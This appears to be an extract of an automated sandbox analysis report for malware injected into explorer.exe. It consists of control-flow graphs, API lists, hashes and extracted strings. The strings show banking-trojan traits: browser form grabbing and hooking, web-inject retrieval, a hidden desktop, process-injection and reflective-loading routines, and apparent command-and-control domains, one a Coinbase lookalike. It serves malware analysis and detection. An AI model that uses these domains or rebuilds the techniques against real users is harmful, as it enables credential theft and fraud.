8cb1a4a VirtualProtect 49652->49654 49653->49613 49656 8cbd1c0 49654->49656 49657 8cb1aa9 FlushInstructionCache 49656->49657 49657->49653 49659 8cb1995 _close_nolock _DllMainCRTStartup 49658->49659 49661 8cb19c8 49658->49661 49660 8cb19af ResumeThread 49659->49660 49659->49661 49660->49659 49662->49639 49663->49620 49664->49624 49666 8cb21ec 49665->49666 49667 8cb224e VirtualQuery 49666->49667 49668 8cb1c8f 49666->49668 49669 8cb22b2 49666->49669 49670 8cb2287 VirtualAlloc 49666->49670 49667->49666 49668->49627 49673 8cb1db4 5 API calls 2 library calls 49668->49673 49669->49668 49671 8cb22da VirtualQuery 49669->49671 49672 8cb231e VirtualAlloc 49669->49672 49670->49666 49670->49668 49671->49669 49672->49669 49673->49629 49674->49634 49675->49627 49676->49622

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                                                                                                                                                                  • String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity$ HTTP/1.1$.exe$/api.php$:Zone.Identifier$Accept-Encoding$Advapi32.dll$As we walked along the flatblock marina, I was calm on the outside, but thinking all the time. So now it was to be Georgie the general, saying what we should do and what not to do, and Dim as his mindless greeding bulldog. But suddenly I viddied that thinking $ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shell_TrayWnd$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$Trusteer$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$\\.\pipe\%s$_errno$_strnicmp$auth.xn--conbase-sfb.xyz$child.dll$chunked$close$closesocket$connect$exchanger.ink$firefox.exe$form|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$info|%d|%d|%d|%d|%s|%s|%d|%d$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$verclsid.exe$version.dll$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                                                                                                                                  • API String ID: 2683923594-3725008869
                                                                                                                                                                                                                                  • Opcode ID: cea85faa188cef2ac31b4e9c32339f6ee1745bb61285e03a6bf18250cc518dce
                                                                                                                                                                                                                                  • Instruction ID: 3b5a71d639cd6ba78741338fc7276aef3e602a42d095952e3bc22dc7c4a5f1dd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cea85faa188cef2ac31b4e9c32339f6ee1745bb61285e03a6bf18250cc518dce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2030778A01F0295FA259B65F8943A573A9BB49BB0F505236CC8943B74EF3CC29CE354

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 95 f3c4520-f3c45cf call f3c68cc lstrcpy lstrcatA * 5 98 f3c4621-f3c4647 lstrcatA call f3fe7d8 95->98 99 f3c45d1-f3c45d5 95->99 103 f3c464d-f3c466f socket 98->103 104 f3c4a94 98->104 99->98 100 f3c45d7-f3c461b lstrcatA wsprintfA lstrcatA * 2 99->100 100->98 105 f3c4a9b-f3c4aa1 call f3fe6f0 103->105 106 f3c4675-f3c4682 gethostbyname 103->106 104->105 109 f3c4aa7-f3c4acb call f3fe810 WSACleanup 105->109 106->105 108 f3c4688-f3c46c8 memcpy htons call f3fe7f8 106->108 108->105 114 f3c46ce-f3c46ef lstrlenA call f3fe800 108->114 114->105 117 f3c46f5-f3c46fc 114->117 118 f3c46fe-f3c4708 call f3fe800 117->118 119 f3c4716-f3c4750 call f3c68cc 117->119 122 f3c470e-f3c4710 118->122 124 f3c4753-f3c476f call f3fe808 119->124 122->105 122->119 124->105 127 f3c4775-f3c4778 124->127 128 f3c477e-f3c4787 127->128 129 f3c4859-f3c4874 127->129 128->129 130 f3c478d-f3c4796 128->130 129->105 131 f3c487a 129->131 130->129 132 f3c479c-f3c47aa 130->132 131->124 133 f3c47ac-f3c47c2 call f3fe7a8 132->133 134 f3c47d0-f3c47e9 lstrlenA 132->134 133->105 143 f3c47c8-f3c47ce 133->143 136 f3c48be-f3c48c0 134->136 137 f3c47ef-f3c4805 StrStrA 134->137 139 f3c48cb-f3c48ce 136->139 140 f3c48c2-f3c48c5 136->140 141 f3c4807-f3c481f call f3fe7a8 137->141 142 f3c4840 137->142 145 f3c48d4-f3c48ff _malloc_dbg 139->145 146 f3c4a37-f3c4a39 139->146 140->105 140->139 155 f3c487f-f3c4891 call f3fe7a8 141->155 156 f3c4821-f3c483a strtol 141->156 147 f3c4847 142->147 150 f3c484e-f3c4852 143->150 152 f3c4903-f3c4918 call f3fe808 145->152 148 f3c4a7d-f3c4a8b _malloc_dbg 146->148 149 f3c4a3b-f3c4a53 _malloc_dbg 146->149 147->150 154 f3c4a8d-f3c4a92 148->154 153 f3c4a56-f3c4a69 call f3fe808 149->153 150->129 160 f3c491e-f3c4920 152->160 162 f3c4a6f-f3c4a71 153->162 154->109 155->142 164 f3c4893-f3c48bc call f3fe7a8 155->164 156->105 156->142 160->105 163 f3c4926-f3c4928 160->163 162->105 165 f3c4a73-f3c4a79 162->165 166 f3c492e-f3c4934 163->166 167 f3c4a12-f3c4a19 163->167 164->147 165->153 169 f3c4a7b 165->169 166->167 170 f3c493a-f3c4940 166->170 171 f3c4a1c-f3c4a23 167->171 169->154 170->167 173 f3c4946-f3c4971 strtol 170->173 171->105 174 f3c4a25 171->174 173->105 175 f3c4977-f3c4979 173->175 174->152 175->105 176 f3c497f 175->176 177 f3c4a2a-f3c4a35 176->177 178 f3c4985-f3c4991 176->178 177->154 179 f3c49ab-f3c49ae 178->179 180 f3c4993-f3c49a7 _realloc_dbg 178->180 181 f3c49b1-f3c49cf call f3fe808 179->181 180->179 181->105 184 f3c49d5-f3c49db 181->184 184->181 185 f3c49dd-f3c49f4 call f3fe808 184->185 185->105 188 f3c49fa-f3c4a10 185->188 188->171
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$recv$lstrcmpi$_malloc_dbg$lstrlensendstrtol$??3@CleanupStartup_realloc_dbgclosesocketconnectgethostbynamehtonslstrcpymemcpysocketwsprintf
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 350249936-3454712805
                                                                                                                                                                                                                                  • Opcode ID: 7a43aa6142627051dcf28554667ab40463675c8a7da61fa207b2092942d0a0b7
                                                                                                                                                                                                                                  • Instruction ID: 1fe52355bdfed31a727e91433faaed4090f4d2efc60d6b771f261eb3498450cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a43aa6142627051dcf28554667ab40463675c8a7da61fa207b2092942d0a0b7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCE1B132610A8296EB30CF26E8547AD77A1F744BA9F805139CE0A47F25DF38DA9CC740

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 257 8cb167c-8cb16da CreateToolhelp32Snapshot 258 8cb17af-8cb17b3 257->258 259 8cb16e0-8cb16f7 call 8cbd1d8 257->259 261 8cb17b9-8cb17c0 258->261 262 8cb18e2-8cb1911 call 8cb3620 258->262 267 8cb179e-8cb17a0 259->267 261->262 265 8cb17c6-8cb17de call 8cbd200 261->265 275 8cb18d5-8cb18dc 265->275 276 8cb17e4-8cb1808 SuspendThread call 8cbd138 265->276 269 8cb16fc-8cb1701 267->269 270 8cb17a6-8cb17a9 call 8cbd128 267->270 273 8cb178c-8cb1798 Thread32Next 269->273 274 8cb1707-8cb1711 GetCurrentProcessId 269->274 270->258 273->267 274->273 277 8cb1713-8cb171d GetCurrentThreadId 274->277 275->262 275->265 283 8cb180e-8cb1812 276->283 284 8cb18cc-8cb18cf call 8cbd128 276->284 277->273 279 8cb171f-8cb1725 277->279 281 8cb174d-8cb1753 279->281 282 8cb1727-8cb1749 HeapAlloc 279->282 287 8cb177c-8cb1789 281->287 288 8cb1755-8cb176f HeapReAlloc 281->288 282->270 286 8cb174b 282->286 289 8cb181e 283->289 290 8cb1814-8cb181c 283->290 284->275 286->287 287->273 288->270 291 8cb1771-8cb1779 288->291 292 8cb1822-8cb1826 289->292 290->292 291->287 292->284 293 8cb182c-8cb1836 292->293 294 8cb1838-8cb1848 293->294 295 8cb184a-8cb184c 294->295 296 8cb1861 294->296 297 8cb185a-8cb185f 295->297 298 8cb184e-8cb1858 295->298 299 8cb1863-8cb1872 296->299 297->299 298->299 300 8cb18bf-8cb18c6 299->300 301 8cb1874-8cb1876 299->301 300->284 300->294 302 8cb191d-8cb1921 301->302 303 8cb187c-8cb1886 301->303 304 8cb1933-8cb193d 302->304 305 8cb1923-8cb192d 302->305 306 8cb1888 303->306 307 8cb18a2 303->307 309 8cb195a-8cb195e 304->309 310 8cb193f 304->310 305->304 308 8cb18a4-8cb18a7 305->308 311 8cb188c-8cb1896 306->311 307->308 308->300 312 8cb18a9-8cb18bb SetThreadContext 308->312 309->307 313 8cb1964-8cb1967 309->313 314 8cb1943-8cb194e 310->314 315 8cb1898-8cb18a0 311->315 316 8cb1912-8cb191b 311->316 312->300 313->308 317 8cb196c-8cb1974 314->317 318 8cb1950-8cb1958 314->318 315->307 315->311 316->308 317->308 318->309 318->314
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CloseContextCurrentHandleThread32$AllocCreateFirstHeapNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2768260010-0
                                                                                                                                                                                                                                  • Opcode ID: 6539af37d86e3f167f80c7e9692eed0ec81c452df2b947bdc02bec03bd4feca2
                                                                                                                                                                                                                                  • Instruction ID: 5ec3144d500fbb5260f5bf5990138e18107756413fbea1fe433e541b1b5e1ac7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6539af37d86e3f167f80c7e9692eed0ec81c452df2b947bdc02bec03bd4feca2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E281B672A11E8086EB28CF26D4607AD77B1FB48B5AF0D811BDA5E47B54DF39C682C710

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 343 8b9ad08-8b9ad47 call 8b9b278 346 8b9ad4a-8b9ad52 343->346 347 8b9ad6e-8b9ad71 346->347 348 8b9ad54-8b9ad63 346->348 347->346 348->347 349 8b9ad65-8b9ad6c 348->349 349->347 350 8b9ad73-8b9ad8f 349->350 351 8b9afac-8b9afd5 VirtualAlloc 350->351 352 8b9ad95-8b9ad9b 350->352 353 8b9aff1-8b9b038 CreateFileMappingA 351->353 354 8b9afd7-8b9afe0 351->354 355 8b9ad9e-8b9ada7 352->355 357 8b9b03a-8b9b053 MapViewOfFile 353->357 358 8b9b07f 353->358 356 8b9afe3-8b9afef 354->356 359 8b9adaa-8b9adb0 355->359 356->353 356->356 357->358 361 8b9b055-8b9b062 357->361 360 8b9b085-8b9b091 358->360 362 8b9adbc 359->362 363 8b9adb2-8b9adba 359->363 364 8b9b0cb-8b9b0d9 360->364 365 8b9b093-8b9b097 360->365 361->360 366 8b9b064-8b9b06b 361->366 367 8b9adbf-8b9adc9 362->367 363->367 370 8b9b0df 364->370 371 8b9b182-8b9b190 364->371 369 8b9b09a-8b9b0b0 365->369 372 8b9b06e-8b9b07b 366->372 367->359 368 8b9adcb-8b9add1 367->368 373 8b9aedd-8b9aee3 368->373 374 8b9add7-8b9adfe 368->374 375 8b9b0c2-8b9b0c9 369->375 376 8b9b0b2-8b9b0c0 369->376 377 8b9b0e3-8b9b101 370->377 378 8b9b23d-8b9b26e 371->378 379 8b9b196-8b9b1a4 371->379 372->372 380 8b9b07d 372->380 382 8b9aee9-8b9af14 373->382 383 8b9af84-8b9af87 373->383 381 8b9ae01-8b9ae0d 374->381 375->364 375->369 376->375 376->376 396 8b9b170-8b9b179 377->396 397 8b9b103 377->397 379->378 384 8b9b1aa-8b9b1af 379->384 380->360 387 8b9ae10-8b9ae20 381->387 388 8b9af17-8b9af20 382->388 385 8b9af89-8b9af8c 383->385 386 8b9af98-8b9afa2 383->386 391 8b9b1b4-8b9b1c8 384->391 385->386 392 8b9af8e-8b9af91 385->392 386->355 394 8b9afa8 386->394 387->387 393 8b9ae22-8b9ae28 387->393 395 8b9af22-8b9af31 388->395 398 8b9b228-8b9b233 391->398 399 8b9b1ca 391->399 392->386 400 8b9af93-8b9af96 392->400 401 8b9ae4a-8b9ae5c 393->401 402 8b9ae2a-8b9ae30 393->402 394->351 395->395 405 8b9af33-8b9af39 395->405 396->377 403 8b9b17f 396->403 406 8b9b107-8b9b10a 397->406 398->391 404 8b9b239 398->404 408 8b9b1d0-8b9b1e2 399->408 400->386 400->394 410 8b9ae6b-8b9ae71 401->410 411 8b9ae5e-8b9ae69 401->411 402->401 409 8b9ae32-8b9ae38 402->409 403->371 404->378 412 8b9af59-8b9af63 405->412 413 8b9af3b-8b9af56 405->413 414 8b9b10c-8b9b119 406->414 415 8b9b144-8b9b154 406->415 416 8b9b1ed-8b9b1f1 408->416 417 8b9b1e4-8b9b1eb 408->417 409->401 420 8b9ae3a-8b9ae40 409->420 422 8b9ae7c-8b9ae82 410->422 423 8b9ae73-8b9ae7a 410->423 421 8b9aeb1-8b9aeb4 411->421 412->388 425 8b9af65-8b9af6d 412->425 413->412 414->415 424 8b9b11b-8b9b142 414->424 436 8b9b157-8b9b161 415->436 418 8b9b1fc-8b9b200 416->418 419 8b9b1f3-8b9b1fa 416->419 426 8b9b220-8b9b226 417->426 429 8b9b213-8b9b216 418->429 430 8b9b202-8b9b211 418->430 419->426 420->401 432 8b9ae42-8b9ae48 420->432 431 8b9aeba-8b9aec7 421->431 434 8b9ae8d-8b9ae93 422->434 435 8b9ae84-8b9ae8b 422->435 433 8b9aead 423->433 424->436 427 8b9af71-8b9af7f 425->427 426->398 426->408 427->383 429->426 441 8b9b218-8b9b21b 429->441 430->426 431->381 442 8b9aecd-8b9aed8 431->442 432->401 443 8b9aeb6 432->443 433->421 437 8b9ae9e-8b9aea4 434->437 438 8b9ae95-8b9ae9c 434->438 435->433 439 8b9b163 436->439 440 8b9b167-8b9b16a 436->440 437->433 444 8b9aea6-8b9aeaa 437->444 438->433 439->440 440->406 445 8b9b16c 440->445 441->426 442->427 443->431 444->433 445->396
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$AllocCreateMappingViewVirtual
                                                                                                                                                                                                                                  • String ID: Refl$Self$ecti$ve
                                                                                                                                                                                                                                  • API String ID: 714694481-879027269
                                                                                                                                                                                                                                  • Opcode ID: d565dd23c1e7a46cf9244b3861bfe1fcdaf73303d77d2f6eb2b6a77248566caf
                                                                                                                                                                                                                                  • Instruction ID: ebcaea0b90b06c9a37572c48212e2ff18c34fe97caf06e0d37f9dc80f9e31381
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d565dd23c1e7a46cf9244b3861bfe1fcdaf73303d77d2f6eb2b6a77248566caf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E112B2B006A0CBDF24CF299440BAD3B65FB04FAAB159179DF9A57B44DB39D452C700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 446 c3696e0-c369721 call c369c04 449 c369724-c36972c 446->449 450 c36972e-c36973d 449->450 451 c369748-c36974b 449->451 450->451 452 c36973f-c369746 450->452 451->449 452->451 453 c36974d-c369769 452->453 454 c369950-c36997b VirtualAlloc 453->454 455 c36976f-c369775 453->455 456 c369995-c3699d8 CreateFileMappingA 454->456 457 c36997d-c369984 454->457 458 c369778-c369783 455->458 460 c369a1e 456->460 461 c3699da-c3699f3 MapViewOfFile 456->461 459 c369987-c369993 457->459 462 c369787-c369791 call c369c44 458->462 459->456 459->459 465 c369a24-c369a30 460->465 461->460 463 c3699f5-c369a01 461->463 473 c369793-c36979b 462->473 474 c36979d 462->474 463->465 466 c369a03-c369a0a 463->466 468 c369a32-c369a36 465->468 469 c369a6a-c369a78 465->469 472 c369a0d-c369a1a 466->472 475 c369a39-c369a4f 468->475 470 c369a7e-c369a82 469->470 471 c369b1c-c369b30 469->471 478 c369a86-c369a9f 470->478 476 c369b36-c369b44 471->476 477 c369bd3-c369c03 471->477 472->472 479 c369a1c 472->479 480 c3697a0-c3697aa 473->480 474->480 481 c369a61-c369a68 475->481 482 c369a51-c369a5f 475->482 476->477 483 c369b4a-c369b4f 476->483 494 c369b01-c369b04 478->494 479->465 480->462 484 c3697ac-c3697b6 480->484 481->469 481->475 482->481 482->482 486 c369b54-c369b68 483->486 488 c3697bc-c3697df 484->488 489 c36989a-c3698a0 484->489 492 c369bc2-c369bcd 486->492 493 c369b6a-c369b7c 486->493 495 c3697e2-c3697f1 call c369c0c 488->495 490 c3698a2-c3698c5 489->490 491 c36991c-c369922 489->491 497 c3698c8-c3698d7 call c369c0c 490->497 500 c369924-c369927 491->500 501 c369933-c36993e 491->501 492->486 502 c369bcf 492->502 498 c369b87-c369b8b 493->498 499 c369b7e-c369b85 493->499 503 c369b06-c369b0f 494->503 504 c369aa1-c369aa4 494->504 516 c3697f3-c3697f8 495->516 517 c36980f-c369820 495->517 526 c3698f8-c369904 497->526 527 c3698d9-c3698f4 497->527 512 c369b96-c369b9a 498->512 513 c369b8d-c369b94 498->513 509 c369bba-c369bc0 499->509 500->501 514 c369929-c36992c 500->514 501->458 506 c369944-c36994c 501->506 502->477 503->478 515 c369b15-c369b19 503->515 510 c369aa6-c369ab3 504->510 511 c369ade-c369aee 504->511 506->454 509->492 509->493 510->511 519 c369ab5-c369adc 510->519 528 c369af1-c369afb 511->528 520 c369b9c-c369bab 512->520 521 c369bad-c369bb0 512->521 513->509 514->501 522 c36992e-c369931 514->522 515->471 516->517 523 c3697fa-c3697ff 516->523 524 c369822-c36982d 517->524 525 c36982f-c369834 517->525 519->528 520->509 521->509 530 c369bb2-c369bb5 521->530 522->501 522->506 523->517 531 c369801-c369806 523->531 532 c369879-c36987e 524->532 533 c369836-c369841 525->533 534 c369843-c369848 525->534 526->497 535 c369906 526->535 527->526 528->494 536 c369afd 528->536 530->509 531->517 538 c369808-c36980d 531->538 537 c369882-c36988e 532->537 533->532 539 c369853-c369858 534->539 540 c36984a-c369851 534->540 541 c36990a-c369916 535->541 536->494 537->495 542 c369894-c369898 537->542 538->517 538->537 543 c369867-c36986c 539->543 544 c36985a-c369865 539->544 540->532 541->491 542->541 543->532 545 c36986e-c369875 543->545 544->532 545->532
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$AllocCreateMappingViewVirtual
                                                                                                                                                                                                                                  • String ID: Refl$Self$ecti$ve
                                                                                                                                                                                                                                  • API String ID: 714694481-879027269
                                                                                                                                                                                                                                  • Opcode ID: 3ab671dce0f2bee2d33412448951d7c02f4600516af10e46328a896e7fd24c04
                                                                                                                                                                                                                                  • Instruction ID: 7b49f24cf59dcf70fc18114970552712635cc3f79637cd687244530fa6dcd752
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ab671dce0f2bee2d33412448951d7c02f4600516af10e46328a896e7fd24c04
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BE1F176B217948BCB24CF2AD58076D77A6FB04B98B25C215DF4A47F48DB39D452CB00

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetUserNameW.ADVAPI32 ref: 0F3C6E69
                                                                                                                                                                                                                                  • GetComputerNameW.KERNEL32 ref: 0F3C6E83
                                                                                                                                                                                                                                    • Part of subcall function 0F3C678C: WideCharToMultiByte.KERNEL32 ref: 0F3C67CC
                                                                                                                                                                                                                                    • Part of subcall function 0F3C678C: _malloc_dbg.MSVCRT ref: 0F3C67DD
                                                                                                                                                                                                                                    • Part of subcall function 0F3C678C: WideCharToMultiByte.KERNEL32 ref: 0F3C680D
                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32 ref: 0F3C6EAC
                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 0F3C6EBD
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0F3C6F03
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: EnterCriticalSection.KERNEL32 ref: 0F3C6170
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: RtlInitializeCriticalSection.NTDLL ref: 0F3C617D
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: lstrcpy.KERNEL32 ref: 0F3C61AA
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: lstrcpy.KERNEL32 ref: 0F3C61CD
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: lstrcatA.KERNEL32 ref: 0F3C61DD
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: lstrcatA.KERNEL32 ref: 0F3C61ED
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: LeaveCriticalSection.KERNEL32 ref: 0F3C624C
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: memcpy.MSVCRT ref: 0F3C6263
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: lstrlenA.KERNEL32 ref: 0F3C6270
                                                                                                                                                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 0F3C6F17
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$ByteCharMultiNameWidelstrcatlstrcpy$??3@ComputerEnterInfoInitializeLeaveNativeSystemUserVersion_malloc_dbglstrlenmemcpywsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2622007461-0
                                                                                                                                                                                                                                  • Opcode ID: 8a8c2bd87329a6aa3a069bc8796b17b9ad3883f058562c429e9bc75352aa0eec
                                                                                                                                                                                                                                  • Instruction ID: cd783dd7a7dd2c782ec27c7bdd0200f3872729bb4f59207756dfed30e52ec25c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a8c2bd87329a6aa3a069bc8796b17b9ad3883f058562c429e9bc75352aa0eec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00413B32A10B819AE730DF35E8543DE77A5F788B58F804129DA4D47A58EF79C649CB80

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 740 8cb21ac-8cb21ea GetSystemInfo 741 8cb21fa-8cb220f 740->741 742 8cb21ec-8cb21f6 740->742 743 8cb2216-8cb2219 741->743 742->741 744 8cb221b-8cb221e 743->744 745 8cb2235-8cb223b 743->745 746 8cb2230-8cb2233 744->746 747 8cb2220-8cb2223 744->747 748 8cb223d-8cb224c 745->748 749 8cb22b2-8cb22b5 745->749 746->743 747->746 751 8cb2225-8cb222a 747->751 752 8cb2278-8cb227e 748->752 750 8cb233e 749->750 756 8cb234b-8cb235b 750->756 757 8cb2340-8cb2343 750->757 751->746 755 8cb238b-8cb23ae 751->755 753 8cb224e-8cb2264 VirtualQuery 752->753 754 8cb2280 752->754 753->754 760 8cb2266-8cb226d 753->760 759 8cb2282-8cb2285 754->759 758 8cb235e-8cb2378 756->758 761 8cb22ba-8cb22d8 757->761 762 8cb2349 757->762 758->758 763 8cb237a-8cb2388 758->763 759->749 764 8cb2287-8cb22a7 VirtualAlloc 759->764 760->759 767 8cb226f-8cb2276 760->767 765 8cb22da-8cb22f0 VirtualQuery 761->765 766 8cb2317 761->766 762->755 763->755 764->756 768 8cb22ad-8cb22b0 764->768 765->766 769 8cb22f2-8cb22f9 765->769 770 8cb2319-8cb231c 766->770 767->752 767->754 768->748 768->749 769->770 771 8cb22fb-8cb2315 769->771 770->755 772 8cb231e-8cb233b VirtualAlloc 770->772 771->765 771->766 772->750
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
